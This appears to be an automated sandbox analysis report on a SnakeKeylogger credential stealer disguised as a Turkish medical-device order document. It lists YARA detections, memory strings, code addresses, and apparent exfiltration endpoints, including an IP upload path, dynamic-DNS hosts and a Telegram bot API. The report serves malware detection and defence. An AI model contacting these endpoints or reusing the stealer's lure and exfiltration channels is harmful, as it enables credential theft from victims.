                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 10 Dec 2024 15:24:39 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4683212312.000000000292A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.2248030461.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4681612879.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.2248030461.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4683212312.0000000002871000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4681612879.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.2248030461.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4683212312.0000000002871000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4681612879.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4683212312.0000000002871000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.2248030461.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4681612879.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.2243855683.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4683212312.0000000002871000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.2248030461.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4683212312.0000000002871000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4681612879.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4687312061.0000000003891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.2248030461.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4683212312.000000000291D000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4681612879.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4687312061.0000000003891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4687312061.0000000003891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4687312061.0000000003891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4683212312.000000000292A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4687312061.0000000003891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4687312061.0000000003891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4687312061.0000000003891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.2248030461.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4681612879.0000000000402000.00000040.00000400.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4683212312.00000000028C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4687312061.0000000003891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4687312061.0000000003891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4683212312.000000000292A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49797 version: TLS 1.2
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3bda670.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3bda670.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3bda670.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 6.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3c1d090.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 6.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3c1d090.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 6.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3c1d090.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3c1d090.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3c1d090.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3bda670.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3bda670.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000006.00000002.4681612879.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000001.00000002.2248030461.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe PID: 7120, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe PID: 1088, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_00F13E341_2_00F13E34
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_00F1E1241_2_00F1E124
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_00F16F901_2_00F16F90
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_05F26BB01_2_05F26BB0
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_05F26BAF1_2_05F26BAF
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_074236681_2_07423668
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_074212401_2_07421240
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_074241171_2_07424117
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_074212301_2_07421230
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_07426D081_2_07426D08
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_07744B701_2_07744B70
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_07744B601_2_07744B60
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_077430601_2_07743060
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_077458681_2_07745868
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_0774302D1_2_0774302D
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_077400151_2_07740015
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_077438D01_2_077438D0
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_077434981_2_07743498
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_077434891_2_07743489
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0284D2846_2_0284D284
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0284C1A76_2_0284C1A7
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0284C73F6_2_0284C73F
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0284C4776_2_0284C477
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0284E9886_2_0284E988
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_028469A06_2_028469A0
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_02843E096_2_02843E09
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0284CFB76_2_0284CFB7
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_02846FC86_2_02846FC8
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0284CCE76_2_0284CCE7
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_02849DE06_2_02849DE0
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_028453816_2_02845381
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_02843AB36_2_02843AB3
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0284CA196_2_0284CA19
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0284E9876_2_0284E987
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0284F98C6_2_0284F98C
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_028429EC6_2_028429EC
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0657DE006_2_0657DE00
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_06571E806_2_06571E80
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_06570B306_2_06570B30
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_065717A06_2_065717A0
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_06579C706_2_06579C70
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0657FC686_2_0657FC68
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_065750286_2_06575028
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_065795486_2_06579548
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_065729686_2_06572968
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0657E2576_2_0657E257
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0657E2586_2_0657E258
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_06571E706_2_06571E70
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0657E6B06_2_0657E6B0
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0657E6AF6_2_0657E6AF
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0657EF516_2_0657EF51
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0657EF606_2_0657EF60
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0657EB086_2_0657EB08
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_06570B206_2_06570B20
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_065793286_2_06579328
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_06579BFA6_2_06579BFA
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_06578B916_2_06578B91
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0657178F6_2_0657178F
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0657F3B86_2_0657F3B8
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_06578BA06_2_06578BA0
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_065700406_2_06570040
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0657F8106_2_0657F810
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_065750186_2_06575018
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0657F8026_2_0657F802
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0657003F6_2_0657003F
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0657D0F86_2_0657D0F8
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0657CCA06_2_0657CCA0
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0657D5506_2_0657D550
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0657295A6_2_0657295A
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0657DDFF6_2_0657DDFF
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0657D9A76_2_0657D9A7
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0657D9A86_2_0657D9A8
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0674B3506_2_0674B350
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_067487676_2_06748767
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0674E1CF6_2_0674E1CF
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_06744D906_2_06744D90
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.2248030461.0000000003A6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.2248030461.0000000003A6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.2259622063.0000000007E20000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.2248030461.0000000003BDA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.2248030461.0000000003BDA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.2258138405.00000000075A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.2242029986.0000000000D0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000000.2210947004.00000000005C6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamecOXk.exeJ vs fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
